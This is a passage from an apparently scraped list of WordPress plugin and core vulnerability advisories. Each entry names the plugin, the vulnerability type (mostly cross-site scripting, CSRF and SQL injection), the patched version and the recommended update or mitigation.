Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via upload[]
Patched Version: 19.1.5.1
Recommended Action: Update to version 19.1.5.1, or a newer patched version

Plugin: Manage Calameo Publications by Athlon

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Advance Menu Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0.7
Recommended Action: Update to version 3.0.7, or a newer patched version

Plugin: Kit (formerly ConvertKit) – Email Newsletter, Email Marketing, Subscribers and Landing Pages

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: PublishPress Capabilities – User Role Editor, Access Permissions, Admin Menus

Vulnerability: Unauthenticated Arbitrary Options Update
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: IDPay for Contact Form 7

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: WP Video Lightbox

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.9.6
Recommended Action: Update to version 1.9.6, or a newer patched version

Plugin: OMFG Mobile Pro

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Link Checker Professional

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.17.0
Recommended Action: Update to version 1.17.0, or a newer patched version

Plugin: Sniplets

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Reflected Cross-Site Scripting via ‘title’
Patched Version: 3.6.22
Recommended Action: Update to version 3.6.22, or a newer patched version

Plugin: Starter Templates — Elementor, WordPress & Beaver Builder Templates

Vulnerability: Missing Authorization to Stored Cross-Site Scripting
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: PayPal Currency Converter BASIC for WooCommerce

Vulnerability: Path Traversal to Arbitrary File Read
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Rencontre – Dating Site

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.2.2
Recommended Action: Update to version 3.2.2, or a newer patched version

Plugin: Easy PayPal Shopping Cart

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.1.11
Recommended Action: Update to version 1.1.11, or a newer patched version

Plugin: Ad Invalid Click Protector (AICP)

Vulnerability: SQL Injection
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: SSL Mixed Content Fix

Vulnerability: Missing Authorization on handle_installation function
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: Image Over Image For WPBakery Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: All In One Favicon

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.7
Recommended Action: Update to version 4.7, or a newer patched version

Plugin: Chained Quiz

Vulnerability: Cross-Site Request Forgery to Submitted Response Deletion
Patched Version: 1.3.2.5
Recommended Action: Update to version 1.3.2.5, or a newer patched version

Plugin: ZYREX POPUP

Vulnerability: Authenticated (Admin+) Arbitrary File Upload
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: RSVPMaker

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via admin settings
Patched Version: 10.6.7
Recommended Action: Update to version 10.6.7, or a newer patched version

Plugin: File Manager Pro – Filester

Vulnerability: <= 1.7.6
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: Membership Plugin – Restrict Content

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: MW Font Changer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.3
Recommended Action: Update to version 4.3, or a newer patched version

Plugin: List Petfinder Pets

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.0.19
Recommended Action: Update to version 1.0.19, or a newer patched version

Plugin: Opening Hours

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Better Search – Relevant search results for WordPress

Vulnerability: Cross-Site Request Forgery to Settings Import
Patched Version: 2.5.3
Recommended Action: Update to version 2.5.3, or a newer patched version

Plugin: Better Click To Tweet

Vulnerability: Missing Authorization
Patched Version: 5.10.4
Recommended Action: Update to version 5.10.4, or a newer patched version

Plugin: Booking Calendar | Appointment Booking | Bookit

Vulnerability: Authentication Bypass
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: Simple Membership

Vulnerability: Cross-Site Scripting
Patched Version: 3.5.7
Recommended Action: Update to version 3.5.7, or a newer patched version

Plugin: Quick Restaurant Menu

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Countdown, Coming Soon, Maintenance – Countdown & Clock

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 2.3.9.6
Recommended Action: Update to version 2.3.9.6, or a newer patched version

Plugin: Author Box, Guest Author and Co-Authors for Your Posts – Molongui

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.6.20
Recommended Action: Update to version 4.6.20, or a newer patched version

Plugin: Car Rental System

Vulnerability: SQL Injection
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: Asgaros Forum

Vulnerability: Admin+ SQL Injection via forum_id
Patched Version: 1.15.15
Recommended Action: Update to version 1.15.15, or a newer patched version

Plugin: Paymattic – Secure, Simple Payment & Donation with Subscription Payments, Recurring Donations, Customer Management

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.2.1
Recommended Action: Update to version 4.2.1, or a newer patched version

Plugin: ZoomSounds – WordPress Wave Audio Player with Playlist

Vulnerability: WordPress Wave Audio Player with Playlist <= 6.45
Patched Version: 6.50
Recommended Action: Update to version 6.50, or a newer patched version

Plugin: My Calendar – Accessible Event Manager

Vulnerability: Path Traversal to Remote Code Execution
Patched Version: 2.3.30
Recommended Action: Update to version 2.3.30, or a newer patched version

Plugin: HTML5 Audio Player- Best WordPress Audio Player Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1.12
Recommended Action: Update to version 2.1.12, or a newer patched version

Plugin: HUSKY – Products Filter Professional for WooCommerce

Vulnerability: Missing Authorization via woof_meta_get_keys()
Patched Version: 1.3.4.3
Recommended Action: Update to version 1.3.4.3, or a newer patched version

Plugin: Namaste! LMS

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.6.1.2
Recommended Action: Update to version 2.6.1.2, or a newer patched version

Plugin: Modal Survey – WordPress Poll, Survey & Quiz Plugin

Vulnerability: Authorization Bypass
Patched Version: 2.0.1.8.2
Recommended Action: Update to version 2.0.1.8.2, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.5
Recommended Action: Update to version 2.8.5, or a newer patched version

Plugin: AM-HiLi

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder

Vulnerability: Sensitive Data Exposure via debug log file
Patched Version: 1.18.0
Recommended Action: Update to version 1.18.0, or a newer patched version

Plugin: OptionTree

Vulnerability: Cross-Site Scripting
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: iubenda | All-in-one Compliance for GDPR / CCPA Cookie Consent + more

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.8.2
Recommended Action: Update to version 2.8.2, or a newer patched version

Plugin: Contact Form By Mega Forms – Drag and Drop Form Builder

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: WordPress Automatic Plugin

Vulnerability: Unauthenticated Arbitrary Options Update
Patched Version: 3.53.3
Recommended Action: Update to version 3.53.3, or a newer patched version

Plugin: WP phpMyAdmin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.2.0.4
Recommended Action: Update to version 5.2.0.4, or a newer patched version

Plugin: Polylang

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Async JavaScript

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 2.21.06.29
Recommended Action: Update to version 2.21.06.29, or a newer patched version

Plugin: Professional Social Sharing Buttons, Icons & Related Posts – Shareaholic

Vulnerability: Information Disclosure
Patched Version: 9.7.6
Recommended Action: Update to version 9.7.6, or a newer patched version

Plugin: Smart External Link Click Monitor [Link Log]

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Cross-Site Request Forgery in savetranslation function
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: cartflows-pro

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.11.13
Recommended Action: Update to version 1.11.13, or a newer patched version

Plugin: Lock User Account

Vulnerability: Cross-Site Request Forgery to Account Lock/Unlock
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: School Management System – WPSchoolPress

Vulnerability: Authenticated (Teacher+) SQL Injection via ClassID
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Rus-To-Lat

Vulnerability: Cross-Site Request Forgery to Plugins Options Changes
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP DS FAQ Plus

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: Dropshix

Vulnerability: Authorization Bypass
Patched Version: 4.0.14
Recommended Action: Update to version 4.0.14, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Request Forgery via give_ajax_store_payment_note
Patched Version: 2.25.3
Recommended Action: Update to version 2.25.3, or a newer patched version

Plugin: WooCommerce Blocks

Vulnerability: Authorization Bypass
Patched Version: 3.7.1
Recommended Action: Update to version 3.7.1, or a newer patched version

Plugin: Ad Inserter Pro

Vulnerability: Arbitrary File Modification
Patched Version: 2.7.16
Recommended Action: Update to version 2.7.16, or a newer patched version

Plugin: WP Job Portal – A Complete Recruitment System for Company or Job Board website

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Level Four Store Front

Vulnerability: Arbitrary File Upload
Patched Version: 8.1.15
Recommended Action: Update to version 8.1.15, or a newer patched version

Plugin: Message ticker

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 9.3
Recommended Action: Update to version 9.3, or a newer patched version

Plugin: WordPress Landing Pages

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.5
Recommended Action: Update to version 1.8.5, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Low-Privileged Stored Cross-Site Scripting
Patched Version: 2.0.46
Recommended Action: Update to version 2.0.46, or a newer patched version

Plugin: feedburner-feedsmith

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: WpStream – Live Streaming, Video on Demand, Pay Per View

Vulnerability: Cross-Site Request Forgery via wpstream_update_local_event_settings
Patched Version: 4.5.5
Recommended Action: Update to version 4.5.5, or a newer patched version

Plugin: Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 2.9.10
Recommended Action: Update to version 2.9.10, or a newer patched version

Plugin: Nice PayPal Button Lite

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BuddyPress

Vulnerability: Missing Authorization to Unauthorized Group Access
Patched Version: 7.3.0
Recommended Action: Update to version 7.3.0, or a newer patched version

Plugin: Database Backups

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: Missing Authorization on ‘hubspot_support_request’ AJAX function
Patched Version: 1.23.3
Recommended Action: Update to version 1.23.3, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘logFilter’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Post to Twitter

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Multi Rating

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.0.6
Recommended Action: Update to version 5.0.6, or a newer patched version

Plugin: User Meta Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Better Tag Cloud

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Accept Donations with PayPal & Stripe

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Clockwork SMS Notfications

Vulnerability: Multiple Versions
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SL User Create

Vulnerability: Information Disclosure
Patched Version: 0.2.5
Recommended Action: Update to version 0.2.5, or a newer patched version

Plugin: Browser and Operating System Finder

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Page Builder by SiteOrigin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Mail Subscribe List

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: WP Social AutoConnect

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 4.0.6
Recommended Action: Update to version 4.0.6, or a newer patched version

Plugin: Leyka

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.30.3
Recommended Action: Update to version 3.30.3, or a newer patched version

Plugin: Panorama – WordPress Project Management Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: WooCommerce Pre-Orders

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Creative Mail – Easier WordPress & WooCommerce Email Marketing

Vulnerability: Cross-Site Request Forgery to Settings Disconnect
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Handsome Testimonials & Reviews

Vulnerability: Authenticated SQL Injection
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Remote Content Shortcode

Vulnerability: Authenticated (Contributor+) Local File Inclusion via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Seamless Donations is Sunset

Vulnerability: Cross-Site Scripting
Patched Version: 5.1.13
Recommended Action: Update to version 5.1.13, or a newer patched version

Plugin: Logo Scheduler – Great for holidays, events, and more

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Autoptimize

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via Critical CSS Rules
Patched Version: 3.1.7
Recommended Action: Update to version 3.1.7, or a newer patched version

Plugin: YITH WooCommerce Ajax Product Filter

Vulnerability: Cross-Site Scripting
Patched Version: 3.11.1
Recommended Action: Update to version 3.11.1, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Cross-Site Request Forgery via ‘queue_posts’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: candidate-application-form

Vulnerability: Arbitrary File Download
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MZ MBO Access

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Multiple Page Generator Plugin – MPG

Vulnerability: Authenticated (Administrator+) SQL Injection in projects_list and total_projects
Patched Version: 3.3.20
Recommended Action: Update to version 3.3.20, or a newer patched version

Plugin: Migrate Users

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: JetElements

Vulnerability: Missing Authorization to Unauthenticated Arbitrary Attachment Download
Patched Version: 2.6.13.1
Recommended Action: Update to version 2.6.13.1, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.2.6
Recommended Action: Update to version 3.2.6, or a newer patched version

Plugin: WP-Polls

Vulnerability: Race Condition
Patched Version: 2.77.0
Recommended Action: Update to version 2.77.0, or a newer patched version

Plugin: Organization chart

Vulnerability: Missing Authorization
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: WPaudio MP3 Player

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Affiliates Manager

Vulnerability: Cross-Site Request Forgery via process_bulk_action()
Patched Version: 2.9.21
Recommended Action: Update to version 2.9.21, or a newer patched version

Plugin: GD Rating System

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Highlight Focus

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ActivityPub

Vulnerability: Authenticated (Subscriber+) Insecure Direct Object Reference to Sensitive Post Title Exposure
Patched Version: 1.0.0
Recommended Action: Update to version 1.0.0, or a newer patched version

Plugin: Laposta Signup Basic

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: EMC – Easily Embed Calendly Scheduling Features

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: Responsive Tabs For WPBakery Page Builder (formerly Visual Composer)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wicked Folders

Vulnerability: Missing Authorization via ajax_save_state
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Core: WordPress MU

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More

Vulnerability: Authenticated Information Disclosure
Patched Version: 6.6.2
Recommended Action: Update to version 6.6.2, or a newer patched version

Plugin: WP-Polls

Vulnerability: SQL Injection
Patched Version: 2.72
Recommended Action: Update to version 2.72, or a newer patched version

Plugin: Five Star Restaurant Menu and Food Ordering

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 2.4.11
Recommended Action: Update to version 2.4.11, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Cross-Site Scripting
Patched Version: 3.9.3
Recommended Action: Update to version 3.9.3, or a newer patched version

Plugin: Easy Media Download

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: GarageSale

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Easy Student Results

Vulnerability: Missing Authorization to Sensitive Information Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Redirect By Cookie

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.07
Recommended Action: Update to version 1.07, or a newer patched version

Plugin: iFolders – Ultimate Folder Organizer for Media Library, Pages, Posts and Users

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.56
Recommended Action: Update to version 1.3.56, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.9.7.4
Recommended Action: Update to version 0.9.7.4, or a newer patched version

Plugin: EWWW Image Optimizer

Vulnerability: Unauthenticated Sensitive Information Exposure via Debug Log
Patched Version: 7.2.1
Recommended Action: Update to version 7.2.1, or a newer patched version

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 5.1.5
Recommended Action: Update to version 5.1.5, or a newer patched version

Plugin: LoginPress | wp-login Custom Login Page Customizer

Vulnerability: Missing Authorization to Settings Changes
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.4
Recommended Action: Update to version 3.4.4, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Unauthenticated Stored Cross-Site Scripting via platform
Patched Version: 13.1.6
Recommended Action: Update to version 13.1.6, or a newer patched version

Plugin: Ultimate Product Catalog

Vulnerability: Cross-Site Scripting
Patched Version: 4.2.12
Recommended Action: Update to version 4.2.12, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Arbitrary File Upload
Patched Version: 6.4.1
Recommended Action: Update to version 6.4.1, or a newer patched version

Plugin: User Submitted Posts – Enable Users to Submit Posts from the Front End

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 20230901
Recommended Action: Update to version 20230901, or a newer patched version

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: OS Command Injection
Patched Version: 5.2
Recommended Action: Update to version 5.2, or a newer patched version

Plugin: PPOM – Product Addons & Custom Fields for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 32.0.7
Recommended Action: Update to version 32.0.7, or a newer patched version

Plugin: WZone – Lite Version

Vulnerability: Lite <= 3.1
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Jquery news ticker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: Custom 404 Pro

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.7.3
Recommended Action: Update to version 3.7.3, or a newer patched version

Plugin: WP Travel – Ultimate Travel Booking System, Tour Management Engine

Vulnerability: Missing Authorization via Multiple AJAX Actions
Patched Version: 7.8.1
Recommended Action: Update to version 7.8.1, or a newer patched version

Plugin: Announcement & Notification Banner – Bulletin

Vulnerability: Missing Authorization Checks
Patched Version: 3.7.0
Recommended Action: Update to version 3.7.0, or a newer patched version

Plugin: Custom Content Shortcode

Vulnerability: Authenticated (Contributor+) Local File Inclusion via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Hubbub Lite – Fast, Reliable Social Sharing Buttons

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.19.0
Recommended Action: Update to version 1.19.0, or a newer patched version

Plugin: Events Made Easy

Vulnerability: Authenticated (Subscriber+) SQL Injection via ‘search_name’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Marketplace – Complete Shopping Cart / eCommerce Solution

Vulnerability: Arbitrary File Upload
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Cross-Site Request Forgery in savetranslationstay function
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Visualizer: Tables and Charts Manager for WordPress

Vulnerability: Authenticated (Contributor+) PHAR Deserialization
Patched Version: 3.7.10
Recommended Action: Update to version 3.7.10, or a newer patched version

Plugin: Smart Flv

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quick Event Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 9.7.5
Recommended Action: Update to version 9.7.5, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting in oEmbed
Patched Version: 3.7.22
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.22, 3.8.22, 3.9.20, 4.0.19, 4.1.19, 4.2.16, 4.3.12, 4.4.11, 4.5.10, 4.6.7, 4.7.6, 4.8.2

Plugin: Wallet for WooCommerce

Vulnerability: Cross-Site Request Forgery via admin_options
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Coming Soon & Maintenance Mode Page & Under Construction

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.58
Recommended Action: Update to version 1.58, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.4.23
Recommended Action: Update to version 3.4.23, or a newer patched version

Plugin: HappyFiles Pro

Vulnerability: Missing Authorization
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: Tiny Carousel Horizontal Slider

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Multi-column Tag Map

Vulnerability: Cross-Site Request Forgery
Patched Version: 17.0.27
Recommended Action: Update to version 17.0.27, or a newer patched version

Plugin: TinyMCE Custom Styles

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: WPZOOM Shortcodes

